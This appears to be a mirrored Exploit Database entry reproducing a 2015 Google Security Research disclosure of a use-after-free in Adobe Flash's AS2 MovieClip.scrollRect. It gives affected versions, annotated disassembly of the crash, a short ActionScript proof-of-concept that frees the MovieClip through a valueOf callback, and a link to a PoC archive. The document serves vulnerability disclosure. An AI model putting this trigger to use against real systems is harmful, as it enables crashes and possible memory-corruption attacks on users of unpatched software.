Adobe Flash AS2 – MovieClip.scrollRect Use-After-Free

• Exploit Database
• 110 阅读

• 作者： Google Security Research
  日期： 2015-08-19
• 类别：

  • dos
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/37854/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62

  Source: https://code.google.com/p/google-security-research/issues/detail?id=359&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id   [Deadline tracking for https://code.google.com/p/chromium/issues/detail?id=482521]   --- VULNERABILITY DETAILS When setting the scrollRect attribute of a MovieClip in AS2 with a custom Rectangle it is possible to free the MovieClip while a reference remains in the stack   VERSION Chrome Version: Chrome stable 42.0.2311.90, Flash 17.0.0.169 Operating System: [Win 7 SP1]   REPRODUCTION CASE That code targets the MovieClip.scrollRect property. While setting this attribute with a custom Rectangle, it is possible to trigger a use after free by freeing the targeted MovieClip. Creating a TextField with the same depth of the targeted MovieClip is enough to free an object and have Flash crash.   These lines come from flashplayer standalone 17.0.0.169:   .text:00597F45 loc_597F45: .text:00597F45 cmp eax, 6 .text:00597F48 jnz loc_597FE5 .text:00597F4E mov ecx, esi ; esi points to the MovieClip object .text:00597F50 callsub_40C1ED .text:00597F55 add eax, 30Ch .text:00597F5A ordword ptr [eax], 8 .text:00597F5D mov eax, [ebx] .text:00597F5F mov byte ptr [eax+82Ch], 1 .text:00597F66 mov ecx, [ebx] .text:00597F68 lea eax, [ebp+74h+var_1C0] .text:00597F6E pusheax .text:00597F6F pushdword ptr [ebx+0Ch] .text:00597F72 callxfetchRectangleProperties; get the Rectangle properties, and execute some AS2 .text:00597F77 testal, al .text:00597F79 jzloc_598274 .text:00597F7F mov edi, [ebp+74h+var_1C0] .text:00597F85 mov ecx, esi .text:00597F87 imuledi, 14h .text:00597F8A callsub_40C1ED; reference freed memory and return a bad   pointer .text:00597F8F mov [eax+310h], edi ; crash here, eax = 0       Poc (compile with Flash CS5.5):   import flash.geom.Rectangle var o2 = {} o2.valueOf = function () { _global.mc.createTextField("newtf",1,1,1,2,3) return 7 } var o = {x:o2,y:0,width:4,height:5}   _global.mc = this var newmc:MovieClip = this.createEmptyMovieClip("newmc",1) newmc.scrollRect = o ---   Proof of Concept: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37854.zip